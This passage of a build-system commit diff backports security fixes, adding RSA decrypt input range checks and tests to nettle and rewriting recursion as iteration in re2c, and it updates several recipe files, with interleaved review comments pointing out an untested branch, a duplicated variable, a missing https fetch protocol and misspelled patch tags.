@@ -0,0 +1,163 @@
+From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:32:38 +0200
+Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions.
+
+(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ rsa-decrypt-tr.c | 4 ++++
+ rsa-decrypt.c | 10 ++++++++++
+ rsa-sec-decrypt.c | 4 ++++
+ rsa.h | 5 +++--
+ testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------
+ 6 files changed, 62 insertions(+), 9 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+Index: nettle-3.5.1/rsa-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt.c
++++ nettle-3.5.1/rsa-decrypt.c
+@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key
+ int res;
+
+ mpz_init(m);
++
++ /* First check that input is in range. Since we don't have the
++ public key available here, we need to reconstruct n. */
++ mpz_mul (m, key->p, key->q);
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0)
++ {
++ mpz_clear (m);
++ return 0;
++ }
++
+ rsa_compute_root(key, m, gibberish);
+
+ res = pkcs1_decrypt (key->size, m, length, message);
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_DECL (em, uint8_t);
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+Index: nettle-3.5.1/rsa.h
+===================================================================
+--- nettle-3.5.1.orig/rsa.h
++++ nettle-3.5.1/rsa.h
+@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_
+ size_t length, uint8_t *message,
+ const mpz_t gibberish);
+
+-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */
++/* Compute x, the e:th root of m. Calling it with x == m is allowed.
++ It is required that 0 <= m < n. */
+ void
+ rsa_compute_root(const struct rsa_private_key *key,
+ mpz_t x, const mpz_t m);
+
+ /* Safer variant, using RSA blinding, and checking the result after
+- CRT. */
++ CRT. It is required that 0 <= m < n. */
+ int
+ rsa_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,11 +19,12 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
+- mpz_t zero;
++ mpz_t bad_input;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+ mpz_init(gibberish);
++ mpz_init(bad_input);
+
+ knuth_lfib_init(&lfib, 17);
+
+@@ -103,15 +104,40 @@ test_main(void)
+ ASSERT(decrypted[0] == 'A');
+
+ /* Test zero input. */
+- mpz_init_set_ui (zero, 0);
++ mpz_set_ui (bad_input, 0);
+ decrypted_length = msg_length;
+- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_decrypt_tr(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- &decrypted_length, decrypted, zero));
++ &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_sec_decrypt(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- decrypted_length, decrypted, zero));
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is slightly larger than n */
++ mpz_add(bad_input, gibberish, pub.n);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is considerably larger than n */
++ mpz_mul_2exp (bad_input, pub.n, 100);
++ mpz_add (bad_input, bad_input, gibberish);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
+ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+@@ -124,6 +150,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
+- mpz_clear(zero);
++ mpz_clear(bad_input);
+ free(decrypted);
+ }
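Review bot: The new range checks reject `mpz_sgn (gibberish) < 0`, but the cases added to testsuite/rsa-encrypt-test.c cover only zero and two values above `n`, so the negative branch is untested in all three decrypt functions. A fourth case that sets `mpz_neg (bad_input, gibberish);`, resets `decrypted_length = msg_length;` and repeats the same three `ASSERT(!rsa_…decrypt…)` calls with the final length check would cover it. As this file is a backport, the extra case is best proposed upstream and picked up from there.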
diff --git a/meta/recipes-support/nettle/nettle_3.5.1.bb b/meta/recipes-support/nettle/nettle_3.5.1.bb
index d92db0ef95..192fd295e9 100644
--- a/meta/recipes-support/nettle/nettle_3.5.1.bb
+++ b/meta/recipes-support/nettle/nettle_3.5.1.bb
@@ -1,5 +1,9 @@
SUMMARY = "A low level cryptographic library"
+DESCRIPTION = "Nettle is a cryptographic library that is designed to fit easily in more or less any context: In crypto toolkits for object-oriented languages (C++, Python, Pike, ...), in applications like LSH or GNUPG, or even in kernel space."
HOMEPAGE = "http://www.lysator.liu.se/~nisse/nettle/"
+DESCRIPTION = "It tries to solve a problem of providing a common set of \
+cryptographic algorithms for higher-level applications by implementing a \
+context-independent set of cryptographic algorithms"
SECTION = "libs"
LICENSE = "LGPLv3+ | GPLv2+"
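Review bot: `DESCRIPTION` is assigned twice in this hunk, once before `HOMEPAGE` and again (as a three-line continued string) after it. Both use plain `=`, so the later assignment replaces the earlier one and the "Nettle is a cryptographic library that is designed to fit easily..." text is never used. Keep whichever wording is intended and drop the other assignment.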
@@ -14,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \
file://Add-target-to-only-build-tests-not-run-them.patch \
file://run-ptest \
file://check-header-files-of-openssl-only-if-enable_.patch \
+ file://CVE-2021-3580_1.patch \
+ file://CVE-2021-3580_2.patch \
+ file://CVE-2021-20305-1.patch \
+ file://CVE-2021-20305-2.patch \
+ file://CVE-2021-20305-3.patch \
+ file://CVE-2021-20305-4.patch \
+ file://CVE-2021-20305-5.patch \
"
SRC_URI_append_class-target = "\
diff --git a/meta/recipes-support/npth/npth_1.6.bb b/meta/recipes-support/npth/npth_1.6.bb
index 88484acec3..94a3f00eac 100644
--- a/meta/recipes-support/npth/npth_1.6.bb
+++ b/meta/recipes-support/npth/npth_1.6.bb
@@ -1,4 +1,5 @@
SUMMARY = "New GNU Portable Threads library"
+DESCRIPTION = "nPth is a library to provide the GNU Pth API and thus a non-preemptive threads implementation. "
HOMEPAGE = "https://www.gnu.org/software/pth/"
SECTION = "libs"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
index 4ba93f998a..5f1b73ee16 100644
--- a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb
+++ b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
@@ -1,18 +1,21 @@
SUMMARY = "Provides a way to load and enumerate PKCS#11 modules"
+DESCRIPTION = " Provides a standard configuration setup for installing PKCS#11 modules in such a way that they're discoverable. Also solves problems with coordinating the use of PKCS#11 by different components or libraries living in the same process."
+HOMEPAGE = "https://p11-glue.github.io/p11-glue/p11-kit.html"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=02933887f609807fbb57aa4237d14a50"
-inherit meson gettext pkgconfig gtk-doc bash-completion
+inherit meson gettext pkgconfig gtk-doc bash-completion manpages
DEPENDS = "libtasn1 libtasn1-native libffi"
DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}"
-SRC_URI = "git://github.com/p11-glue/p11-kit"
-SRCREV = "762cdaa2cd5c5ec09cc844f9a6bdc551c7f6c8ed"
+SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https"
+SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee"
S = "${WORKDIR}/git"
PACKAGECONFIG ??= ""
+PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native"
PACKAGECONFIG[trust-paths] = "-Dtrust_paths=/etc/ssl/certs/ca-certificates.crt,,,ca-certificates"
GTKDOC_MESON_OPTION = 'gtk_doc'
diff --git a/meta/recipes-support/popt/popt_1.16.bb b/meta/recipes-support/popt/popt_1.16.bb
index 27e49c2ca2..0c0392d036 100644
--- a/meta/recipes-support/popt/popt_1.16.bb
+++ b/meta/recipes-support/popt/popt_1.16.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for parsing command line options"
+DESCRIPTION = "Popt is a C library for parsing command line parameters. Popt was heavily influenced by the getopt() and getopt_long() functions, but it improves on them by allowing more powerful argument expansion. Popt can parse arbitrary argv[] style arrays and automatically set variables based on command line arguments."
HOMEPAGE = "http://rpm5.org/"
SECTION = "libs"
diff --git a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
index 8b9938f572..3401b7b39e 100644
--- a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
+++ b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe"
SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd"
PV .= "+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \
+SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \
"
UPSTREAM_VERSION_UNKNOWN = "1"
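Review bot: The fetch URL gains `branch=master` but no `protocol=`, so it stays on the git fetcher's default `git://` transport, which is neither authenticated nor encrypted. The p11-kit recipe in this same commit adds `protocol=https` alongside its branch parameter. The pinned `SRCREV` limits what a tampered transport could deliver, but for consistency I would write `SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master;protocol=https \`.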
@@ -27,3 +27,5 @@ do_compile () {
do_install () {
install -D -m 0755 ${S}/ptest-runner ${D}${bindir}/ptest-runner
}
+
+RDEPENDS_${PN}_append_libc-glibc = " libgcc"
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
new file mode 100644
index 0000000000..b7dcaefad3
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
@@ -0,0 +1,347 @@
+From fd634998f813340768c333cdad638498602856e5 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Tue, 21 Apr 2020 21:28:32 +0100
+Subject: [PATCH] Rewrite recursion into iteration (Tarjan's SCC algorithm and
+ YYFILL states).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Stack overflow reported by Agostino Sarubbo.
+Related to #219 "overflow-1.re test fails on system with small stack".
+
+Upstram-Status: Backport:
+https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/dfa/fillpoints.cc b/src/dfa/fillpoints.cc
+--- a/src/dfa/fillpoints.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/dfa/fillpoints.cc (date 1646929180243)
+@@ -5,151 +5,186 @@
+
+ #include "src/dfa/dfa.h"
+
+-namespace re2c
+-{
++
++/*
++ * note [finding strongly connected components of DFA]
++ *
++ * A slight modification of Tarjan's algorithm.
++ *
++ * The algorithm traverses the DFA in depth-first order. It maintains a stack
++ * of states that have already been visited but haven't been assigned to an SCC
++ * yet. For each state the algorithm calculates 'lowlink': index of the highest
++ * ancestor state reachable in one step from a descendant of this state.
++ * Lowlink is used to determine when a set of states should be popped off stack
++ * into a new SCC.
++ *
++ * We use lowlink to hold different kinds of information:
++ * - values in range [0 .. stack size] mean that the state is on stack (a
++ * link to a state with the smallest index reachable from this one)
++ * - SCC_UND means that this state has not been visited yet
++ * - SCC_INF means that this state has already been popped off stack
++ *
++ * We use stack size (rather than topological sort index) as a unique index of
++ * the state on stack. This is safe because the indices of states on stack are
++ * unique and less than the indices of states that have been popped off stack
++ * (SCC_INF).
++ */
++
++namespace re2c {
++ namespace {
+
+-static const size_t SCC_INF = std::numeric_limits<size_t>::max();
+-static const size_t SCC_UND = SCC_INF - 1;
++ static const size_t SCC_INF = std::numeric_limits<size_t>::max();
++ static const size_t SCC_UND = SCC_INF - 1;
+
+-static bool loopback(size_t node, size_t narcs, const size_t *arcs)
+-{
+- for (size_t i = 0; i < narcs; ++i)
+- {
+- if (arcs[i] == node)
+- {
+- return true;
+- }
+- }
+- return false;
+-}
++ static bool loopback(size_t state, size_t narcs, const size_t *arcs)
++ {
++ for (size_t i = 0; i < narcs; ++i) {
++ if (arcs[i] == state) return true;
++ }
++ return false;
++ }
+
+-/*
+- * node [finding strongly connected components of DFA]
+- *
+- * A slight modification of Tarjan's algorithm.
+- *
+- * The algorithm walks graph in deep-first order. It maintains a stack
+- * of nodes that have already been visited but haven't been assigned to
+- * SCC yet. For each node the algorithm calculates 'lowlink': index of
+- * the highest ancestor node reachable in one step from a descendant of
+- * the node. Lowlink is used to determine when a set of nodes should be
+- * popped off the stack into a new SCC.
+- *
+- * We use lowlink to hold different kinds of information:
+- * - values in range [0 .. stack size] mean that this node is on stack
+- * (link to a node with the smallest index reachable from this one)
+- * - SCC_UND means that this node has not been visited yet
+- * - SCC_INF means that this node has already been popped off stack
+- *
+- * We use stack size (rather than topological sort index) as unique index
+- * of a node on stack. This is safe because indices of nodes on stack are
+- * still unique and less than indices of nodes that have been popped off
+- * stack (SCC_INF).
+- *
+- */
+-static void scc(
+- const dfa_t &dfa,
+- std::stack<size_t> &stack,
+- std::vector<size_t> &lowlink,
+- std::vector<bool> &trivial,
+- size_t i)
+-{
+- const size_t link = stack.size();
+- lowlink[i] = link;
+- stack.push(i);
++ struct StackItem {
++ size_t state; // current state
++ size_t symbol; // next arc to be visited in this state
++ size_t link; // Tarjan's "lowlink"
++ };
++
++// Tarjan's algorithm
++ static void scc(const dfa_t &dfa, std::vector<bool> &trivial,
++ std::vector<StackItem> &stack_dfs)
++ {
++ std::vector<size_t> lowlink(dfa.states.size(), SCC_UND);
++ std::stack<size_t> stack;
++
++ StackItem x0 = {0, 0, 0};
++ stack_dfs.push_back(x0);
++
++ while (!stack_dfs.empty()) {
++ const size_t i = stack_dfs.back().state;
++ size_t c = stack_dfs.back().symbol;
++ size_t link = stack_dfs.back().link;
++ stack_dfs.pop_back();
++
++ const size_t *arcs = dfa.states[i]->arcs;
++
++ if (c == 0) {
++ // DFS recursive enter
++ //DASSERT(lowlink[i] == SCC_UND);
++ link = lowlink[i] = stack.size();
++ stack.push(i);
++ }
++ else {
++ // DFS recursive return (from one of successor states)
++ const size_t j = arcs[c - 1];
++ //DASSERT(lowlink[j] != SCC_UND);
++ lowlink[i] = std::min(lowlink[i], lowlink[j]);
++ }
+
+- const size_t *arcs = dfa.states[i]->arcs;
+- for (size_t c = 0; c < dfa.nchars; ++c)
+- {
+- const size_t j = arcs[c];
+- if (j != dfa_t::NIL)
+- {
+- if (lowlink[j] == SCC_UND)
+- {
+- scc(dfa, stack, lowlink, trivial, j);
+- }
+- if (lowlink[j] < lowlink[i])
+- {
+- lowlink[i] = lowlink[j];
+- }
+- }
+- }
++ // find the next successor state that hasn't been visited yet
++ for (; c < dfa.nchars; ++c) {
++ const size_t j = arcs[c];
++ if (j != dfa_t::NIL) {
++ if (lowlink[j] == SCC_UND) {
++ break;
++ }
++ lowlink[i] = std::min(lowlink[i], lowlink[j]);
++ }
++ }
+
+- if (lowlink[i] == link)
+- {
+- // SCC is non-trivial (has loops) iff it either:
+- // - consists of multiple nodes (they all must be interconnected)
+- // - consists of single node which loops back to itself
+- trivial[i] = i == stack.top()
+- && !loopback(i, dfa.nchars, arcs);
++ if (c < dfa.nchars) {
++ // recurse into the next successor state
++ StackItem x1 = {i, c + 1, link};
++ stack_dfs.push_back(x1);
++ StackItem x2 = {arcs[c], 0, SCC_UND};
++ stack_dfs.push_back(x2);
++ }
++ else if (lowlink[i] == link) {
++ // all successors have been visited
++ // SCC is non-trivial (has loops) if either:
++ // - it contains multiple interconnected states
++ // - it contains a single self-looping state
++ trivial[i] = i == stack.top() && !loopback(i, dfa.nchars, arcs);
+
+- size_t j;
+- do
+- {
+- j = stack.top();
+- stack.pop();
+- lowlink[j] = SCC_INF;
+- }
+- while (j != i);
+- }
+-}
++ for (;;) {
++ const size_t j = stack.top();
++ stack.pop();
++ lowlink[j] = SCC_INF;
++ if (i == j) break;
++ }
++ }
++ }
++ }
+
+-static void calc_fill(
+- const dfa_t &dfa,
+- const std::vector<bool> &trivial,
+- std::vector<size_t> &fill,
+- size_t i)
+-{
+- if (fill[i] == SCC_UND)
+- {
+- fill[i] = 0;
+- const size_t *arcs = dfa.states[i]->arcs;
+- for (size_t c = 0; c < dfa.nchars; ++c)
+- {
+- const size_t j = arcs[c];
+- if (j != dfa_t::NIL)
+- {
+- calc_fill(dfa, trivial, fill, j);
+- size_t max = 1;
+- if (trivial[j])
+- {
+- max += fill[j];
+- }
+- if (max > fill[i])
+- {
+- fill[i] = max;
+- }
+- }
+- }
+- }
+-}
+-
+-void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
+-{
+- const size_t size = dfa.states.size();
+-
+- // find DFA states that belong to non-trivial SCC
+- std::stack<size_t> stack;
+- std::vector<size_t> lowlink(size, SCC_UND);
+- std::vector<bool> trivial(size, false);
+- scc(dfa, stack, lowlink, trivial, 0);
+-
+- // for each DFA state, calculate YYFILL argument:
+- // maximal path length to the next YYFILL state
+- fill.resize(size, SCC_UND);
+- calc_fill(dfa, trivial, fill, 0);
++ static void calc_fill(const dfa_t &dfa, const std::vector<bool> &trivial,
++ std::vector<StackItem> &stack_dfs, std::vector<size_t> &fill)
++ {
++ const size_t nstates = dfa.states.size();
++ fill.resize(nstates, SCC_UND);
++
++ StackItem x0 = {0, 0, SCC_INF};
++ stack_dfs.push_back(x0);
++
++ while (!stack_dfs.empty()) {
++ const size_t i = stack_dfs.back().state;
++ size_t c = stack_dfs.back().symbol;
++ stack_dfs.pop_back();
++
++ const size_t *arcs = dfa.states[i]->arcs;
++
++ if (c == 0) {
++ // DFS recursive enter
++ if (fill[i] != SCC_UND) continue;
++ fill[i] = 0;
++ }
++ else {
++ // DFS recursive return (from one of successor states)
++ const size_t j = arcs[c - 1];
++ //DASSERT(fill[i] != SCC_UND && fill[j] != SCC_UND);
++ fill[i] = std::max(fill[i], 1 + (trivial[j] ? fill[j] : 0));
++ }
++
++ // find the next successor state that hasn't been visited yet
++ for (; c < dfa.nchars; ++c) {
++ const size_t j = arcs[c];
++ if (j != dfa_t::NIL) break;
++ }
++
++ if (c < dfa.nchars) {
++ // recurse into the next successor state
++ StackItem x1 = {i, c + 1, SCC_INF};
++ stack_dfs.push_back(x1);
++ StackItem x2 = {arcs[c], 0, SCC_INF};
++ stack_dfs.push_back(x2);
++ }
++ }
+
+- // The following states must trigger YYFILL:
+- // - inital state
+- // - all states in non-trivial SCCs
+- // for other states, reset YYFILL argument to zero
+- for (size_t i = 1; i < size; ++i)
+- {
+- if (trivial[i])
+- {
+- fill[i] = 0;
+- }
+- }
+-}
++ // The following states must trigger YYFILL:
++ // - inital state
++ // - all states in non-trivial SCCs
++ // for other states, reset YYFILL argument to zero
++ for (size_t i = 1; i < nstates; ++i) {
++ if (trivial[i]) {
++ fill[i] = 0;
++ }
++ }
++ }
+
++ } // anonymous namespace
++
++ void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
++ {
++ const size_t nstates = dfa.states.size();
++ std::vector<bool> trivial(nstates, false);
++ std::vector<StackItem> stack_dfs;
++ stack_dfs.reserve(nstates);
++
++ // find DFA states that belong to non-trivial SCC
++ scc(dfa, trivial, stack_dfs);
++
++ // for each DFA state, calculate YYFILL argument:
++ // maximal path length to the next YYFILL state
++ calc_fill(dfa, trivial, stack_dfs, fill);
++ }
++
+ } // namespace re2c
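Review bot: The status tag in this patch header is misspelled as `Upstram-Status:`, so tooling that looks for an `Upstream-Status:` line will presumably treat the patch as having no status. The same line is misspelled in CVE-2018-21232-2.patch (`Upstream-Stauts:`) and CVE-2018-21232-4.patch (`Upstram-Status:`); only CVE-2018-21232-3.patch spells the tag correctly. I would write it on one line as `Upstream-Status: Backport [https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5]`, using each file's own commit URL.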
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
new file mode 100644
index 0000000000..820a6decbc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
@@ -0,0 +1,243 @@
+From 7b5643476bd99c994c4f51b8143f942982d85521 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Wed, 22 Apr 2020 22:37:24 +0100
+Subject: [PATCH] Rewrite recursion into iteration (fixed tags computation).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Stauts: Backport:
+https://github.com/skvadrik/re2c/commit/7b5643476bd99c994c4f51b8143f942982d85521
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/tag.cc b/src/re/tag.cc
+--- a/src/re/tag.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.cc (date 1646986908580)
+@@ -6,7 +6,7 @@
+ {
+
+ const size_t Tag::RIGHTMOST = std::numeric_limits<size_t>::max();
+-const size_t Tag::VARDIST = std::numeric_limits<size_t>::max();
++const uint32_t Tag::VARDIST = std::numeric_limits<uint32_t>::max();
+ const size_t Tag::FICTIVE = Tag::RIGHTMOST - 1;
+
+ } // namespace re2c
+
+
+diff --git a/src/re/tag.h b/src/re/tag.h
+--- a/src/re/tag.h (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.h (date 1646986922376)
+@@ -19,7 +19,7 @@
+ struct Tag
+ {
+ static const size_t RIGHTMOST;
+- static const size_t VARDIST;
++ static const uint32_t VARDIST;
+ static const size_t FICTIVE;
+
+ const std::string *name;
+
+
+diff --git a/src/re/fixed_tags.cc b/src/re/fixed_tags.cc
+--- a/src/re/fixed_tags.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/fixed_tags.cc (date 1646991137317)
+@@ -7,78 +7,131 @@
+ #include "src/re/tag.h"
+
+ namespace re2c {
++namespace {
+
+ /* note [fixed and variable tags]
+ *
+- * If distance between two tags is constant (equal for all strings that
+- * match the given regexp), then lexer only needs to track one of them:
+- * the second tag equals the first tag plus static offset.
++ * If distance between two tags is constant (equal for all strings that match
++ * the given regexp), then lexer only needs to track one of them: the second
++ * tag equals the first tag plus static offset.
+ *
+- * However, this optimization is applied only to tags in top-level
+- * concatenation, because other tags may be uninitialized and we don't
+- * want to mess with conditional calculation of fixed tags.
+- *
++ * This optimization is applied only to tags in top-level concatenation,
++ * because in other cases the base tag may be NULL, and the calculation of
++ * the fixed tag value is not as simple as substracting a fixed offset.
+ * Furthermore, fixed tags are fobidden with generic API because it cannot
+- * express fixed offsets.
+- *
+- * Tags with history also cannot be fixed.
++ * express fixed offsets. M-tags (with history) also cannot be fixed.
+ *
+ * Another special case is fictive tags (those that exist only to impose
+- * hierarchical laws of POSIX disambiguation). We treat them as fixed
+- * in order to suppress code generation.
++ * hierarchical laws of POSIX disambiguation). We treat them as fixed in order
++ * to suppress code generation.
+ */
+
+-static void find_fixed_tags(RE *re, std::vector<Tag> &tags,
+- size_t &dist, size_t &base, bool toplevel)
++struct StackItem {
++ RE *re; // current sub-RE
++ uint32_t dist; // distance backup for alternative, unused for other RE
++ uint8_t succ; // index of the next successor to be visited
++ bool toplevel; // if this sub-RE is in top-level concatenation
++};
++
++static void find_fixed_tags(RESpec &spec, std::vector<StackItem> &stack, RE *re0)
+ {
+- switch (re->type) {
+- case RE::NIL: break;
+- case RE::SYM:
+- if (dist != Tag::VARDIST) ++dist;
+- break;
+- case RE::ALT: {
+- size_t d1 = dist, d2 = dist;
+- find_fixed_tags(re->alt.re1, tags, d1, base, false);
+- find_fixed_tags(re->alt.re2, tags, d2, base, false);
+- dist = (d1 == d2) ? d1 : Tag::VARDIST;
+- break;
+- }
+- case RE::CAT:
+- find_fixed_tags(re->cat.re2, tags, dist, base, toplevel);
+- find_fixed_tags(re->cat.re1, tags, dist, base, toplevel);
+- break;
+- case RE::ITER:
+- find_fixed_tags(re->iter.re, tags, dist, base, false);
+- dist = Tag::VARDIST;
+- break;
+- case RE::TAG: {
+- // see note [fixed and variable tags]
+- Tag &tag = tags[re->tag.idx];
+- if (fictive(tag)) {
+- tag.base = tag.dist = 0;
+- } else if (toplevel && dist != Tag::VARDIST && !history(tag)) {
+- tag.base = base;
+- tag.dist = dist;
+- } else if (toplevel) {
+- base = re->tag.idx;
+- dist = 0;
+- }
+- if (trailing(tag)) dist = 0;
+- break;
+- }
+- }
++ static const uint32_t VARDIST = Tag::VARDIST;
++ bool toplevel = spec.opts->input_api != INPUT_CUSTOM;
++
++ // base tag, intially the fake "rightmost tag" (the end of RE)
++ size_t base = Tag::RIGHTMOST;
++
++ // the distance to the nearest top-level tag to the right (base tag)
++ uint32_t dist = 0;
++
++ const StackItem i0 = {re0, VARDIST, 0, toplevel};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++ RE *re = i.re;
++
++ if (re->type == RE::SYM) {
++ if (dist != VARDIST) ++dist;
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // save the current distance on stack (from the alternative end
++ // to base) and recurse into the left sub-RE
++ StackItem k = {re, dist, 1, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, VARDIST, 0, false};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // save the current distance on stack (from the left sub-RE to
++ // base), reset distance to the distance popped from stack (from
++ // the alternative end to base), recurse into the right sub-RE
++ StackItem k = {re, dist, 2, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->alt.re2, VARDIST, 0, false};
++ stack.push_back(j);
++ dist = i.dist;
++ }
++ else {
++ // both sub-RE visited, compare the distance on stack (from the
++ // left sub-RE to base) to the current distance (from the right
++ // sub-RE to base), if not equal set variable distance
++ dist = (i.dist == dist) ? i.dist : VARDIST;
++ }
++ }
++ else if (re->type == RE::ITER) {
++ if (i.succ == 0) {
++ // recurse into the sub-RE
++ StackItem k = {re, VARDIST, 1, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->iter.re, VARDIST, 0, false};
++ stack.push_back(j);
++ }
++ else {
++ // sub-RE visited, assume unknown number of iterations
++ // TODO: find precise distance for fixed repetition counter
++ dist = VARDIST;
++ }
++ }
++ else if (re->type == RE::CAT) {
++ // the right sub-RE is pushed on stack after the left sub-RE and
++ // visited earlier (because distance is computed from right to left)
++ StackItem j1 = {re->cat.re1, VARDIST, 0, i.toplevel};
++ stack.push_back(j1);
++ StackItem j2 = {re->cat.re2, VARDIST, 0, i.toplevel};
++ stack.push_back(j2);
++ }
++ else if (re->type == RE::TAG) {
++ // see note [fixed and variable tags]
++ Tag &tag = spec.tags[re->tag.idx];
++ if (fictive(tag)) {
++ tag.base = tag.dist = 0;
++ }
